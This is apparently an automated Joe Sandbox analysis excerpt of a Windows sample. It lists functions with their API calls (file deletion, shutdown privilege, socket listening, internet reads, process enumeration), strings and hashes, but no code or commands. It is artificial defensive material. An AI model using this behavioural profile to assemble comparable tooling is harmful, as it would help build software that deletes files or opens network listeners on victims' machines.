                                                        • Instruction Fuzzy Hash: C2228C716083019FD724DF14C891BAEB7E4AF84714F10492EF89A97392DB75EA44CBA3
                                                        Function 000D5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: debf5383e1c22df0c4c99dade529f23799817663fdf0c590f3e50887c8134b21
                                                        • Instruction ID: 1b07765bc4e09ab90c5b31bdc4ca08851569ce64d4106f250d179ca663b6b535
                                                        • Opcode Fuzzy Hash: debf5383e1c22df0c4c99dade529f23799817663fdf0c590f3e50887c8134b21
                                                        • Instruction Fuzzy Hash: B2128A70A00609DFDF18DFA5D981AEEB7F5FF48300F10452AE846A7291EB75AD90CB64
                                                        Function 00123B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00123B89
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00123BD9
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00123BEA
                                                        • FindClose.KERNEL32(00000000), ref: 00123C01
                                                        • FindClose.KERNEL32(00000000), ref: 00123C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 7a6d292bc3cb44e7790d926444e80675a731cd46fa57d1a870ac51ee9f6f6c55
                                                        • Instruction ID: b3f25445d4da1513984481961eb38b52d86b1a1c7c21ab70d46ae586fef3d373
                                                        • Opcode Fuzzy Hash: 7a6d292bc3cb44e7790d926444e80675a731cd46fa57d1a870ac51ee9f6f6c55
                                                        • Instruction Fuzzy Hash: 79318D350083959BC205EF24D891DEFB7A8BF96311F404E2DF4E5921A2EB34DA19CB62
                                                        Function 001251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 001187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                          • Part of subcall function 001187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                          • Part of subcall function 001187E1: GetLastError.KERNEL32 ref: 00118865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 001251F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: be3d36f41e6b5e16aac111b8b5d2789ec16b75e87a669b1fe9a7530ec8444e1a
                                                        • Instruction ID: 32ea9b4f66d5e9d1bbf745d3d1edcebe459f6eaf2c6265da101e32f2002c1236
                                                        • Opcode Fuzzy Hash: be3d36f41e6b5e16aac111b8b5d2789ec16b75e87a669b1fe9a7530ec8444e1a
                                                        • Instruction Fuzzy Hash: D4014239691631EBE72C2368BCCAFBA725AAB15380F200424F903E20D2DB705C6181A0
                                                        Function 00136283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 001362DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001362EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00136307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00136316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136330
                                                        • closesocket.WSOCK32(00000000), ref: 00136344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 36df1540be35585803b39e3cd0fea3f9ff096291da1a587bf74296eeee8632cf
                                                        • Instruction ID: 5a4ff1a9a4f9c641fb4e4bf84c8ee3c53622086365db5414f69e8817f388ab84
                                                        • Opcode Fuzzy Hash: 36df1540be35585803b39e3cd0fea3f9ff096291da1a587bf74296eeee8632cf
                                                        • Instruction Fuzzy Hash: 6421D075600200AFCB10EF64C849FAEB7A9FF49720F15816CF81AA73A2CB70AC41CB51
                                                        Function 000D5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • _memmove.LIBCMT ref: 00110258
                                                        • _memmove.LIBCMT ref: 0011036D
                                                        • _memmove.LIBCMT ref: 00110414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: f1de2566bcf98664b95038142588ffdd8e4ee09c6b2e7e35a51154708afd4289
                                                        • Instruction ID: 2efc27388af4188744047b56e568e2fec363577ea0e91d4c416fd145510d2531
                                                        • Opcode Fuzzy Hash: f1de2566bcf98664b95038142588ffdd8e4ee09c6b2e7e35a51154708afd4289
                                                        • Instruction Fuzzy Hash: 68029E70A00609DFCF09DF65D985AAE7BB5FF48300F148069E80AEB356EB75D990CB91
                                                        Function 000C1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 000C19FA
                                                        • GetSysColor.USER32(0000000F), ref: 000C1A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 000C1A61
                                                          • Part of subcall function 000C1290: DefDlgProcW.USER32(?,00000020,?), ref: 000C12D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: 4a168299af453b38c869f3290c98ce78a05e275194d22e2879183ec800fe96df
                                                        • Instruction ID: c7688ec3f32df569b5194d46ec9a195c07b2860deb0f92ba62f82af767b79b91
                                                        • Opcode Fuzzy Hash: 4a168299af453b38c869f3290c98ce78a05e275194d22e2879183ec800fe96df
                                                        • Instruction Fuzzy Hash: D2A12371106548BAE778AB299C44FFF35DDDB4B381B14011EF603D69A3CB219D42AAB3
                                                        Function 0012BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012BCE6
                                                        • _wcscmp.LIBCMT ref: 0012BD16
                                                        • _wcscmp.LIBCMT ref: 0012BD2B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012BD3C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0012BD6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: f89962661cf9afabca0d2a978b7dffca5462764e00e1a76db6aea7c41717f0f3
                                                        • Instruction ID: 9e51e1402698f1f651e1d42186460ae419e34ba3c2d01fd807ebedae3fead2c0
                                                        • Opcode Fuzzy Hash: f89962661cf9afabca0d2a978b7dffca5462764e00e1a76db6aea7c41717f0f3
                                                        • Instruction Fuzzy Hash: B3519A35608A169FC718DF68D4D0EEAB3E4EF49324F10461DE95A873A2DB30ED15CB91
                                                        Function 00136747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00137D8B: inet_addr.WSOCK32(00000000), ref: 00137DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0013679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001367C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00136800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0013680D
                                                        • closesocket.WSOCK32(00000000), ref: 00136821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 5bf9cf55f31d722d383d61575092acfc866d9431b03835934666c1567d41397a
                                                        • Instruction ID: 0584262c4246c42d003bd38423f57e2107ced84f19295dc9531af34f53a4572a
                                                        • Opcode Fuzzy Hash: 5bf9cf55f31d722d383d61575092acfc866d9431b03835934666c1567d41397a
                                                        • Instruction Fuzzy Hash: 5841A375A00210AFDB50AF648C86FAE77E8EF49B14F44846CF916AB3D3CB709D418B91
                                                        Function 00145376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 78b996fe836d05535afdbe0194890ef30e0bbed6374690cf8b606af0a308101a
                                                        • Instruction ID: ad0f923565e512a58a1b00fb0015052fc6b73e8cef86004e2e8a6116cce5e087
                                                        • Opcode Fuzzy Hash: 78b996fe836d05535afdbe0194890ef30e0bbed6374690cf8b606af0a308101a
                                                        • Instruction Fuzzy Hash: E911B231700911AFEB215F269C48B6E7B9AFF457A1B45403CF845D7263DB709C428AA4
                                                        Function 001180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001180C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001180CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001180D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001180E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001180F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: e7c8c152df36fd607b3ff9f3ad97e1ea74d107737e38fe6db30e477de6c9dee8
                                                        • Instruction ID: f95c56d251d9e5630a88f0b81c4bd90420d2e33faf7b7c733b3a99e81fb1d63a
                                                        • Opcode Fuzzy Hash: e7c8c152df36fd607b3ff9f3ad97e1ea74d107737e38fe6db30e477de6c9dee8
                                                        • Instruction Fuzzy Hash: 69F04435240204BFE7100FA5DC8DEA73BADEF86755B104039F549C6260CB619C83DA60
                                                        Function 0012C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0012C432
                                                        • CoCreateInstance.OLE32(00152D6C,00000000,00000001,00152BDC,?), ref: 0012C44A
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • CoUninitialize.OLE32 ref: 0012C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: f1167c6c1dda2d188a2e0e767ce62dc246e85b8817b7d8a61e148c908382e150
                                                        • Instruction ID: 093d9489ee286c5cd653e1bdf8ba83042952c8663423d21e3a2905561187a088
                                                        • Opcode Fuzzy Hash: f1167c6c1dda2d188a2e0e767ce62dc246e85b8817b7d8a61e148c908382e150
                                                        • Instruction Fuzzy Hash: 5EA13D71104205AFD700EF54C885EAFB7E8FF99354F00492CF5559B1A2EB71EA49CB62
                                                        Function 000C4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4AD0), ref: 000C4B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C4B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 513aba87b9586699345bcf93affac4c0236faa87a0c899bb8e3ecfa2755e2b9b
                                                        • Instruction ID: 6a89760ad99ce4a7481a136c4ed43e6dc561713ac53a8eedeecf6b17d5a58c53
                                                        • Opcode Fuzzy Hash: 513aba87b9586699345bcf93affac4c0236faa87a0c899bb8e3ecfa2755e2b9b
                                                        • Instruction Fuzzy Hash: 35D012B4A10713CFD7209F31D828F4676E4AF06791B11883DA485D6660D770D8C1C654
                                                        Function 0013EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0013EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0013EE4B
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0013EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0013EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: f21d66deac0cfa78dd5fca5ff93c097f4d07e701055de01ec34d3237a6e3cc90
                                                        • Instruction ID: ac5a265914e71f205cea81d5fe2042d6ebc8656b388df692347bbdaecaa931cc
                                                        • Opcode Fuzzy Hash: f21d66deac0cfa78dd5fca5ff93c097f4d07e701055de01ec34d3237a6e3cc90
                                                        • Instruction Fuzzy Hash: 59515B71504311ABD310EF24CC85FAFB7E8EF98710F10482DF596972A2EB70A909CB92
                                                        Function 0011E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0011E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 05c120b0116219c98b4448f11e4d90812c8270a70743722488f82d7aa9aa541e
                                                        • Instruction ID: 033994f1bcce20ec689a92da991daacf99dc9c6dfceeb6ce0d5b4d3c48c02b87
                                                        • Opcode Fuzzy Hash: 05c120b0116219c98b4448f11e4d90812c8270a70743722488f82d7aa9aa541e
                                                        • Instruction Fuzzy Hash: 8B323575A007059FDB28CF59D4819AAB7F1FF48320B15C46EE89ADB3A1E770E981CB44
                                                        Function 001322EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0013180A,00000000), ref: 001323E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00132418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 3ea2d9cfc92a7dd2e02c8a650ef1586e1892e5d7bfab6f894d0c992f1d6048b3
                                                        • Instruction ID: d3d1439e4c773cf7e19f8312ee26951698016b05e6cd2b0021559a6f331804c0
                                                        • Opcode Fuzzy Hash: 3ea2d9cfc92a7dd2e02c8a650ef1586e1892e5d7bfab6f894d0c992f1d6048b3
                                                        • Instruction Fuzzy Hash: CD410571A04309BFEB20EE95DC81FBBB7BCFB44724F10402EF645A6241EBB59E419660
                                                        Function 0012B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012B343
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0012B39D
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0012B3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
